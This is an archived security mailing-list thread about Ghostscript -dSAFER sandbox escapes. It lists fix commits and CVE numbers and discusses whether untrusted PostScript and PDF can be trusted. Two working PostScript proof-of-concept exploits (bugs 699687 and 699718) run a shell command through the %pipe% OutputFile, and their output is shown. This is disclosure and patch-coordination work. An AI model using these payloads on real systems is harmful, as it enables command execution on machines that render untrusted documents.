http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling
undefinedfilename
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without
`PS2:' or
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
`PS3:' prefixes according `convert -debug Policy -log "%e"' it
seems
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g.
"%!PS-Adobe"). It
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then
be
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am
using at
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409
Nuernberg; Zi.
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
Brandon Perry
2018-09-04 20:02:22 UTC
Permalink
Post by Tavis Ormandy
OK, well, the fixes missed 9.24 so vendors will have to either ship patches
once they land or wait for 9.25.
$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)
Let me know if anyone wants that testcase.
Hey Tavis, could I have a copy of the test case please? Thanks so much.
Post by Tavis Ormandy
Tavis.
Post by Tavis Ormandy
Thanks Marcus. FWIW, over the weekend upstream fixed all of the bugs I had
opened. Just looking this morning and I can see one or two of the fixes
were incomplete, I'll file new bugs and hopefully new fixes make it into
9.24 release.
(I'm only fuzzing with sort -R < postscript_commands.txt | gs -dSAFER, so
totally possible we'll have to do this again soon)
Tavis.
(p.s. I'm not exaggerating about the sort -R, that's literally how I'm
fuzzing it)
Post by Marcus Meissner
Hi,
I am still holding back CVE requesting as CERT promised to do this.
If they do not reply with a plan until tomorrow I will proceed with requesting.
Ciao, Marcus
Post by Tavis Ormandy
I should note, just add `userdict /setpagedevice undef` at the top if
you
Post by Tavis Ormandy
want to test it with ImageMagick.
Tavis.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
# 699676 PDF interpreter can leave dangerous operators available
Please note that not all issues are resolved, and I have exploits that
still work against HEAD.
For example, this will still work if you pull master as of this
$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
a0 % just select a papersize to initialize page device
% You can't def HWResolution (for example), because currentpagedevice
is
Post by Tavis Ormandy
Post by Tavis Ormandy
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put
% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if
% now LockSafetyParams will be incorrectly unset, you can check like
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams
get
Post by Tavis Ormandy
Post by Tavis Ormandy
== pop
% false
% we can change and configure devices now, so make sure we're using
one
Post by Tavis Ormandy
Post by Tavis Ormandy
with
% a OutputFile property.
(ppmraw) selectdevice
% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12
Tavis.
Post by Marcus Meissner
Hi,
I had 4 CVEs assigned yesterday afternoon already working from CERTs
list,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
see inline comments below. Please adjust if something is incorrect in them.
CERT has mailed overnight that they will take care of the CVE
assignment,
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
so
I am defering the rest to them.
Ciao, Marcus
Post by Tavis Ormandy
Here is an update, Artifex made a press release
<
https://www.darkreading.com/prnewswire2.asp?rkey=20180824UN89145&filter=3930
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
listing
some necessary commits, but the list was incomplete.
Here is a list of relevant commits I'm aware of so far, some
issues are
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
still open with working exploits available. It's my understanding
that
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
no
Post by Tavis Ormandy
new release is planned until late September, and vendors need to
either
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
ship a git snapshot when all issues are resolved, or apply
patches. I
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
have
Post by Tavis Ormandy
testcases for each problem, but I think the bugs will be visible
eventually
Post by Tavis Ormandy
so I'm not posting them here.
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699671
handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699659 missing type check in ztype
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
#
Post by Tavis Ormandy
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699655
Post by Tavis Ormandy
- missing type checking in setcolor
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
#
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
699656
Post by Tavis Ormandy
- LockDistillerParams boolean missing type checks
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15910
Post by Tavis Ormandy
# 699658 - Bypassing PermitFileReading by handling
undefinedfilename
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
errors
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699660 - shading_param incomplete type checking
CVE-2018-15909
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699661 - pdf14 garbage collection memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699663 - .setdistillerkeys memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699664 - corrupt device object after error in job
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
# 699665 - memory corruption in aesdecode
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
CVE-2018-15911
Post by Tavis Ormandy
# 699668 - .definemodifiedfont memory corruption if /typecheck is
handled
Post by Tavis Ormandy
Tavis
On Thu, Aug 23, 2018 at 8:05 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Leonardo Taccari
(Regarding the `file.ps2' and `file.ps3' examples without
`PS2:' or
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
`PS3:' prefixes according `convert -debug Policy -log "%e"' it
seems
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
Post by Leonardo Taccari
Domain: Coder; rights=Read; pattern="PS" ...
...so should be blocked by the workaround described in
VU#332928. But please correct me if I'm wrong.)
This is likely due to header magic detection (e.g.
"%!PS-Adobe"). It
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
is possible that a different path will be taken if the common
Postscript header is not detected. The file extension may then
be
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
used as a hint. Also, there are a wide varieties of ImageMagick
versions in use, with a wide variety of behaviors.
The version of ImageMagick provided by the Ubuntu Linux I am
using at
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
Post by Tavis Ormandy
Post by Bob Friesenhahn
this moment dates from 2012!
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Tavis Ormandy
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409
Nuernberg; Zi.
Post by Tavis Ormandy
Post by Tavis Ormandy
Post by Marcus Meissner
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
--
Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi.
3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <
Tavis Ormandy
2018-09-04 20:08:57 UTC
Permalink
Post by AmitB
Post by Tavis Ormandy
OK, well, the fixes missed 9.24 so vendors will have to either ship
patches
Post by Tavis Ormandy
once they land or wait for 9.25.
$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)
Let me know if anyone wants that testcase.
Hey Tavis, could I have a copy of the test case please? Thanks so much.
Sure, here it is.

Thanks, Tavis.
Tavis Ormandy
2018-09-05 18:02:48 UTC
Permalink
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can be
bypassed, so filed another bug for that (the new bug is 699718).

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)


I would like to re-emphasize that while Ghostscript is very capable and
mature software, I consider the -dSAFER sandbox to be a fragile security
boundary and that we should consider deprecating (or minimizing the use of)
untrusted postscript.

Tavis.
Post by Tavis Ormandy
Post by AmitB
Post by Tavis Ormandy
OK, well, the fixes missed 9.24 so vendors will have to either ship
patches
Post by Tavis Ormandy
once they land or wait for 9.25.
$ ./gs -v
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
$ ./gs -q -dSAFER -sDEVICE=ppmraw -f testcase.ps
uid=1000(taviso) gid=1000(taviso)
Let me know if anyone wants that testcase.
Hey Tavis, could I have a copy of the test case please? Thanks so much.
Sure, here it is.
Thanks, Tavis.
Perry E. Metzger
2018-09-05 19:01:28 UTC
Permalink
Post by Tavis Ormandy
I would like to re-emphasize that while Ghostscript is very capable
and mature software, I consider the -dSAFER sandbox to be a fragile
security boundary and that we should consider deprecating (or
minimizing the use of) untrusted postscript.
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security flaws
in just -dSAFER or is it overall security bugs? If it's the former,
given how few things actually need any of the features past what
-dSAFER offers, perhaps compiling the code by default without any such
capabilities would work well? You can't run what isn't there.

Perry
--
Perry E. Metzger ***@piermont.com
Stuart Gathman
2018-09-05 19:13:53 UTC
Permalink
Post by Perry E. Metzger
Post by Tavis Ormandy
I would like to re-emphasize that while Ghostscript is very capable
and mature software, I consider the -dSAFER sandbox to be a fragile
security boundary and that we should consider deprecating (or
minimizing the use of) untrusted postscript.
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security flaws
in just -dSAFER or is it overall security bugs? If it's the former,
given how few things actually need any of the features past what
-dSAFER offers, perhaps compiling the code by default without any such
capabilities would work well? You can't run what isn't there.
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying only on
the SAFER sandbox is a very bad idea.

What I need to study, is whether random PDF files from the internet (as
opposed to general postscript) are therefore malware vectors.  I thought
that PDF used a restricted subset of operations that "rendered" it not a
general purpose language and therefore "safe".   But if SAFER was the
implementation of that restricted subset, then all internet PDFs are
suspect.
Perry E. Metzger
2018-09-06 00:37:19 UTC
Permalink
Post by Stuart Gathman
Post by Perry E. Metzger
I haven't been following the bugs in depth (just noticing the
continuous stream of them arriving), but is the issue security
flaws in just -dSAFER or is it overall security bugs? If it's the
former, given how few things actually need any of the features
past what -dSAFER offers, perhaps compiling the code by default
without any such capabilities would work well? You can't run what
isn't there.
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying
only on the SAFER sandbox is a very bad idea.
I know it's a general purpose language, but if you ifdef out *all* the
IO (except to the page) and all system calls and the like from the
implementation, there's limits to what it can do. As it stands the
implementation has all those capabilities in the code, but does
anything anyone cares about actually need any of them under any
normal circumstances? If not, they can just be removed, which is a
lot easier to audit than a sandbox.

Perry
--
Perry E. Metzger ***@piermont.com
Leonid Isaev
2018-09-05 23:32:20 UTC
Permalink
Post by Stuart Gathman
Postscript is a general purpose programming language.  It can do
anything to your system that a C or Python program could.  The SAFER
sandbox was supposed to be able to prevent untrusted postscript code
from doing serious damage.  But this series of bugs shows that the
sandbox is very flawed, and running untrusted postscript relying only on
the SAFER sandbox is a very bad idea.
What I need to study, is whether random PDF files from the internet (as
opposed to general postscript) are therefore malware vectors.  I thought
that PDF used a restricted subset of operations that "rendered" it not a
general purpose language and therefore "safe".   But if SAFER was the
implementation of that restricted subset, then all internet PDFs are
suspect.
In addition to that, pdf files can contains things like javascript... There are
some python tools to analyze them and detect (even obfuscated JS) -- see [1]
and links therein. But yes, unless you generate a pdf/ps file yourself (e.g.
with pdflatex or a graphics program), you should consider it untrusted.

Cheers,
L.

[1] https://stackoverflow.com/questions/29342542/how-can-i-extract-a-javascript-from-a-pdf-file-with-a-command-line-tool
--
Leonid Isaev
Jakub Wilk
2018-09-06 13:17:25 UTC
Permalink
Post by Leonid Isaev
pdf files can contains things like javascript...
Do any open-source PDF browsers actually execute embedded JS?
--
Jakub Wilk
Leonid Isaev
2018-09-06 16:21:09 UTC
Permalink
Post by Jakub Wilk
Post by Leonid Isaev
pdf files can contains things like javascript...
Do any open-source PDF browsers actually execute embedded JS?
Currently, evince, okular and gv don't. The same goes for zathura with its
poppler backend (haven't checked this, but pretty sure). But then there is also
Artifex Mupdf which, AFAIR, supports JS in pdf files (by extension, so does
zathura when viewing a pdf file using the mupdf plugin). I don't know how
complete that support is. Most importantly, many Android pdf/ebook readers
probably include JS support.

CHeers,
L.
--
Leonid Isaev
Tavis Ormandy
2018-09-09 19:27:26 UTC
Permalink
[resending post that bounced]

Another update, that bypass is now fixed with these commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002

The problem was that the previous
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4> commit
relied on catching any errors, then restoring a sane state in the error
handler. That won't work, because the trusted code shares the same operand
stack with untrusted code, so you can (for example) just fill it up with
junk and cause a stack overflow. That causes the stopped proc to stop,
leaving the page device in insecure state ("stopped" is the PostScript
equivalent of "threw an exception").

Here is a test case:

%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving
page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a
/stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)

I dunno if I believe there are no other ways to make that fail, I'll think
about it. I can see there are bunch more security related commits in git
that are not from my reports, so I guess there are more on the way anyway.

Tavis.
Post by Leonid Isaev
Post by Jakub Wilk
Post by Leonid Isaev
pdf files can contains things like javascript...
Do any open-source PDF browsers actually execute embedded JS?
Currently, evince, okular and gv don't. The same goes for zathura with its
poppler backend (haven't checked this, but pretty sure). But then there is also
Artifex Mupdf which, AFAIR, supports JS in pdf files (by extension, so does
zathura when viewing a pdf file using the mupdf plugin). I don't know how
complete that support is. Most importantly, many Android pdf/ebook readers
probably include JS support.
CHeers,
L.
--
Leonid Isaev
Tavis Ormandy
2018-09-09 19:26:01 UTC
Permalink
Post by Tavis Ormandy
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can
be
Post by Tavis Ormandy
bypassed, so filed another bug for that (the new bug is 699718).
I see <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
is now closed. As far as I can tell, these are the (only) commits
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5812b1b78fc4d36fdc293b7859de69241140d590
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002fb9c131313253c307cf3951b3d47
Which are all variations of CVE-2018-16509. Is my understanding correct?
Yes, I think that's enough for all the issues I reported. There are some
more security commits in git (like this one
<http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=fb713b3818b52d8a6cf62c951eba2e1795ff9624>)
that are not from me though. That one in particular seems like a good idea,
errordict is like window.onerror in PostScript, a top-level exception
handler. It's hard to believe there are many legitimate untrusted documents
using complex exception handling logic ¯\_(ツ)_/¯
Many thanks to Tavis and P0 for finding these and keeping us in the
loop!
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e914f1da46e33decc534486598dc3eadf69e6efb
Marcus Meissner
2018-09-11 06:04:36 UTC
Permalink
Post by Tavis Ormandy
Quick update, this
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4>
commit fixes that problem, but I noticed that fix is incomplete and can
be
Post by Tavis Ormandy
bypassed, so filed another bug for that (the new bug is 699718).
I see <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
is now closed. As far as I can tell, these are the (only) commits
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5812b1b78fc4d36fdc293b7859de69241140d590
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002fb9c131313253c307cf3951b3d47
Which are all variations of CVE-2018-16509. Is my understanding correct?
Mitre has assigned CVE-2018-16802 to these 3 commits.

Ciao, Marcus

Marcus Meissner
2018-09-06 12:52:52 UTC
Permalink
Hi,
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671
handling /undefined results in SEGV
CVE-2018-16510
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0edd3d6c63
# 699659 missing type check in ztype
CVE-2018-16511
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=78911a01b6 #
699654 A /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5516c614dc33 #
699654 B /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=79cccf641486 #
699654 C /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
699654 D /invalidaccess checks stop working after a failed restore
CVE-2018-16509
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b326a716
# 699655 - missing type checking in setcolor
CVE-2018-16513
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c3476dde
# 699656 - LockDistillerParams boolean missing type checks
CVE-2018-15910
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a054156d42
# 699658 - Bypassing PermitFileReading by handling undefinedfilename errors
CVE-2018-16539
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0b6cd1918e1ec4ffd087400a754a845180a4522b
# 699660 - shading_param incomplete type checking
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=e01e77a36cbb2e0277bc3a63852244bec41be0f6
# 699660 - shading_param incomplete type checking
CVE-2018-15909
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=c432131c3f
# 699661 - pdf14 garbage collection memory corruption
CVE-2018-16540
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
CVE Requested (this morning, will be assigned in some hours I expect)
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
CVE-2018-16541
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
CVE-2018-15911
Post by Tavis Ormandy
